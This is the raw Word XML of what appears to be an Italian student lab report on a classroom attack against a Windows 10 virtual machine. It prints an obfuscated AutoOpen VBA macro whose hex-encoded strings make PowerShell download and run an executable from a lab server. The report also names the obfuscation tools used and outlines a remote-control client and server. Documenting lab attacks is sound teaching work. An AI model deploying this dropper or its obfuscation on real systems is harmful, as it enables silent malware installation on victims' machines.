        <w:t xml:space="preserve">    Set shell = Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007F217B" w14:textId="536B495D" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5961D559" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00B355D4" w:rsidP="00267F5A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lastRenderedPageBreak/>
        <w:t>CODICE MACRO OFFUSCATO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32921947" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRPr="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve">Const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>ooezovykprtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve"> = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2F0AB" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve">Const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>aqmjwdobeoqj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve"> = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6CA6A" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve">Const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>ehtsfjs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF6DBA5" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve">Sub </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>AutoOpen(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7430CE4A" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve">Dim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>lsqusheic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve"> As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A11EFFA" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve">Dim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>gcgrrlkyyn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve"> As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D80272" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve">Dim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>hbwgdnzhgeyo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve"> As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC908D3" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve">Dim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>ajkquovldiyoumav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve"> As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC94A6" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve">Dim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>vmfosuiwtjww</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve"> As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10670617" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve">Dim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>tzicbtrtaod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve"> As Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F46CED" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>tzicbtrtaod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>VBA.CreateObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>twnukwpmlvzmxls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t xml:space="preserve">"57536372") &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>twnukwpmlvzmxls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:t>("6970742e5368656c6c"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E397D51" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>hbwgdnzhgeyo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> = twnukwpmlvzmxls("494558285b53797374656d2e546578742e456e636f64696e675d3a3a555446382e476574537472696e67285b53797374656d2e436f6e766572745d3a3a46726f6d426173653634") &amp; twnukwpmlvzmxls("537472696e6728274241534536345f454e434f4445445f434f4d4d414e4427292929")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4511B647" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ajkquovldiyoumav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>hbwgdnzhgeyo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>twnukwpmlvzmxls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">("4241534536345f") &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>twnukwpmlvzmxls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">("454e434f4445445f434f4d4d414e44"), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>twnukwpmlvzmxls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>("4b45") &amp; twnukwpmlvzmxls("356c64793150596d706c59335167546d56304c6c646c596b4e736157567564436b7552473933626d7876595752476157786c4b43646f644852774f6938764d546b794c6a45324f4334784c6a45774f6a67774d44417663474635624739685a43356c6547556e4c43416e517a706356584e6c636e4e6359334a706333526352473933626d78765957527a58485a70636e567a4c6d56345a536370"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFEEE7A" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>vmfosuiwtjww</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>hbwgdnzhgeyo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>twnukwpmlvzmxls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">("4241534536") &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>twnukwpmlvzmxls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">("345f454e434f4445445f434f4d4d414e44"), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>twnukwpmlvzmxls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>("494359674a304d365846") &amp; twnukwpmlvzmxls("567a5a584a7a58474e7961584e3058455276643235736232466b6331783261584a316379356c6547556e"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A004B57" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>tzicbtrtaod.Run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> twnukwpmlvzmxls("706f7765727368656c6c2e657865202d4e6f50726f66696c6520") &amp; twnukwpmlvzmxls("2d457865637574696f6e506f6c69637920427970617373202d436f6d6d616e6420") &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ajkquovldiyoumav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ehtsfjs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B277E4" w14:textId="7C857D53" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>tzicbtrtaod.Run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>twnukwpmlvzmxls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">("706f77") &amp; twnukwpmlvzmxls("65727368656c6c2e657865202d4e6f50726f66696c65202d457865637574696f6e506f6c69637920427970617373202d436f6d6d616e6420") &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>vmfosuiwtjww</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ehtsfjs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472645DB" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:pPr>
        <w:pStyle w:val="Titolo1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 w:rsidRPr="00267F5A"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Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tzicbtrtaod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F5A"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 = Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFDB814" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A"/>
    <w:p w14:paraId="798F9316" w14:textId="77777777" w:rsidR="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A"/>
    <w:p w14:paraId="77EB6988" w14:textId="64AC174D" w:rsidR="00267F5A" w:rsidRPr="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Il codice è</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> stato offuscato con il seguente offuscatore: </w:t>
      </w:r>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>https://github.com/sevagas/macro_pack.git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB02C8E" w14:textId="632C754B" w:rsidR="00267F5A" w:rsidRPr="00267F5A" w:rsidRDefault="00267F5A" w:rsidP="00267F5A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Il seguente programma genera un documento Word con la macro offuscata all’interno. Come input è necessario dare la macro non offuscata. (ho dato in input la macro direttamente coi comandi codificati in base 64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DAA53" w14:textId="60DF04E2" w:rsidR="003D71C6" w:rsidRPr="00267F5A" w:rsidRDefault="003D71C6" w:rsidP="00267F5A">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>INFRASTRUTTURA ATTACCO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FC2A6C" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRPr="00267F5A" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2329B906" w14:textId="485F51C7" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>In questa sezione dovete presentare le macchine virtuali utilizzate per condurre l’attacco e come sono state configurate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4770B8" w14:textId="73CF8303" w:rsidR="00B355D4" w:rsidRPr="00D1660C" w:rsidRDefault="00B355D4" w:rsidP="003D71C6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t>ATTACCANTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D444A79" w14:textId="23E4D9BB" w:rsidR="00B355D4" w:rsidRPr="00D1660C" w:rsidRDefault="00B355D4" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>L’attaccante è la macchina Kali Linux usata a lezione</w:t>
      </w:r>
      <w:r w:rsidR="00196577" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> con un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00196577" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00196577" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> statico</w:t>
      </w:r>
      <w:r w:rsidR="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>, ho scritto due programmi in C# che rappresentano rispettivamente il client e il server. La vittima aprendo il documento Word malevolo si collega ad un server creato con il comando “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00267F5A" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00267F5A" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00267F5A" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00267F5A" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8000</w:t>
      </w:r>
      <w:r w:rsidR="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">” e scarica il payload malevolo. L’attaccante avvierà poi la console ed inserirà come input l’indirizzo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> della vittima fornitogli dal server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Il payload è stato offuscato usando il seguente software: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="004A1568" w:rsidRPr="0036707E">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>https://github.com/0xb11a1/yetAnotherObfuscator.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00267F5A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004A1568">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> L’unico possibile “comando malevolo” che ho implementato è la scrittura di un messaggio da remoto usando il prompt della vittima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2ECAC" w14:textId="63E62EC9" w:rsidR="00B160DA" w:rsidRPr="00D1660C" w:rsidRDefault="00B160DA" w:rsidP="0081456B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t>VITTIMA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110FA8A2" w14:textId="2350C97F" w:rsidR="00B160DA" w:rsidRPr="00D1660C" w:rsidRDefault="00B160DA" w:rsidP="0081456B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>La vittima è una macchina Windows</w:t>
      </w:r>
      <w:r w:rsidR="00D1660C" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> con Windows Defender disabilitato e con pacchetto Office installato</w:t>
      </w:r>
      <w:r w:rsidR="00D72A89" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A536A2" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA0797" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>per permettere l’apertura del document</w:t>
      </w:r>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00BA0797" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Word malevolo</w:t>
      </w:r>
      <w:r w:rsidR="00A536A2" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B31DDC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
